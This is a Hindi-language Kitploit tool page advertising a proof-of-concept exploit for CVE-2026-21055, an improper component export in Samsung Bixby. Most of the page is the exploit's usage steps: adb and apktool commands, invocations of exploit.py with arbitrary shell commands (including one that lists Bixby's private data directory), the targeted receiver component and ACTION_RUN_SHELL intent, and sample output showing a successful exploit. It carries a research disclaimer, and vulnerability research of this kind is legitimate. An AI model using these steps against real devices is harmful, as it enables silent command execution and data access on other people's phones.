Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
samsung-bixby-command-execution-cve-2026-21055-improper-component-export — CVE-2026-21055 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Samsung Bixby में अनुचित रूप से निर्यात किए गए Android घटकों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है। इसमें घटक विश्लेषण और Intent-आधारित आक्रमण स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षालर्निंग और शिक्षाबाइनरी शोषण
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

CVE-2026-21055 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Samsung Bixby में अनुचित रूप से निर्यात किए गए Android घटकों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है। इसमें घटक विश्लेषण और Intent-आधारित आक्रमण स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-21055 PoC — सैमसंग बिक्सबी में अनुचित कंपोनेंट एक्सपोर्ट

CVE-2026-21055 के लिए प्रूफ ऑफ कॉन्सेप्ट: सैमसंग बिक्सबी में संस्करण 4.0.70.8 से पहले Android एप्लिकेशन कंपोनेंट्स का अनुचित एक्सपोर्ट, स्थानीय हमलावरों को बिक्सबी विशेषाधिकार के साथ मनमाने कमांड निष्पादित करने की अनुमति देता है।

अवलोकन

इस रिपॉजिटरी में दो Python स्क्रिप्ट शामिल हैं:

  1. analyze_components.py — डिकंपाइल किए गए AndroidManifest.xml को पार्स करके एक्सपोर्टेड activities, services, receivers और providers को सूचीबद्ध करता है। बिना permission गार्ड के एक्सपोर्ट किए गए कंपोनेंट्स को फ्लैग करता है।

  2. exploit.py — adb shell am के माध्यम से बिक्सबी के एक्सपोर्टेड कमांड रिसीवर को एक निर्मित broadcast Intent भेजकर Intent-आधारित हमले का प्रदर्शन करता है, और बिक्सबी के सिस्टम-स्तरीय विशेषाधिकारों के साथ एक कमांड निष्पादित करता है।

भेद्यता विवरण

फ़ील्डमान
CVE IDCVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — उच्च
CWECWE-926 — Android एप्लिकेशन कंपोनेंट्स का अनुचित एक्सपोर्ट
प्रभावित ऐपSamsung Bixby (com.samsung.android.bixby.agent)
प्रभावित संस्करण< 4.0.70.8
फिक्स किया गया संस्करण4.0.70.8
हमला वेक्टरस्थानीय (उसी डिवाइस पर दुर्भावनापूर्ण ऐप)
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता इंटरैक्शनकोई नहीं
प्रभावबिक्सबी विशेषाधिकार के साथ मनमाना कमांड निष्पादन

आवश्यक शर्तें

  • adb (Android SDK Platform Tools) इंस्टॉल हो और PATH पर उपलब्ध हो
  • USB डिबगिंग सक्षम वाला एक सैमसंग गैलेक्सी डिवाइस
  • लक्ष्य डिवाइस पर बिक्सबी संस्करण < 4.0.70.8
  • कंपोनेंट विश्लेषण के लिए: apktool इंस्टॉल हो और PATH पर उपलब्ध हो

उपयोग

1. बिक्सबी के एक्सपोर्टेड कंपोनेंट्स का विश्लेषण करें

डिवाइस से बिक्सबी APK पुल करें और उसे डिकंपाइल करें:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

विश्लेषण स्क्रिप्ट चलाएँ:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

या स्क्रिप्ट को स्वचालित रूप से डिकंपाइल करने दें:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. लाइव डिवाइस पर एक्सपोर्टेड कंपोनेंट्स की सूची देखें

root@kitploit:~
$ python3 exploit.py --list

3. एक्सप्लॉइट चलाएँ

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

अपेक्षित आउटपुट

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

यह कैसे काम करता है

  1. कंपोनेंट एक्सपोर्ट: बिक्सबी एक या अधिक कंपोनेंट्स (services/receivers) एक्सपोर्ट करता है जो कमांड निष्पादन या ऑटोमेशन ट्रिगर को संभालते हैं। ये कंपोनेंट्स android:exported="true" के साथ एक्सपोर्ट किए जाते हैं, लेकिन बिना android:permission एट्रिब्यूट या रनटाइम अनुमति जांच के।

  2. Intent वितरण: डिवाइस पर कोई भी ऐप इन एक्सपोर्टेड कंपोनेंट्स को एक Intent भेज सकता है। Intent एक एक्शन स्ट्रिंग (जैसे, ACTION_RUN_SHELL) और स्ट्रिंग एक्स्ट्रा ले जाता है, जिसमें निष्पादित किए जाने वाले कमांड और एक आउटपुट फ़ाइल पथ होता है।

  3. कमांड निष्पादन: बिक्सबी का एक्सपोर्टेड कंपोनेंट Intent प्राप्त करता है, कमांड निकालता है, और उसे Runtime.exec() या इसी तरह के तंत्र के माध्यम से निष्पादित करता है। कमांड बिक्सबी के प्रोसेस कॉन्टेक्स्ट में चलता है और बिक्सबी की सभी सिस्टम-स्तरीय अनुमतियाँ विरासत में लेता है।

  4. कोई उपयोगकर्ता इंटरैक्शन नहीं: एक्सप्लॉइट को किसी उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती। दुर्भावनापूर्ण ऐप पृष्ठभूमि में चुपचाप Intent भेज देता है।

अस्वीकरण

यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। केवल उन्हीं डिवाइसों पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है। मालिक की सहमति के बिना इस एक्सप्लॉइट का उपयोग डिवाइसों के विरुद्ध न करें।

स्रोत

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • सैमसंग मोबाइल सुरक्षा बुलेटिन (जुलाई 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
टूल डाउनलोड करें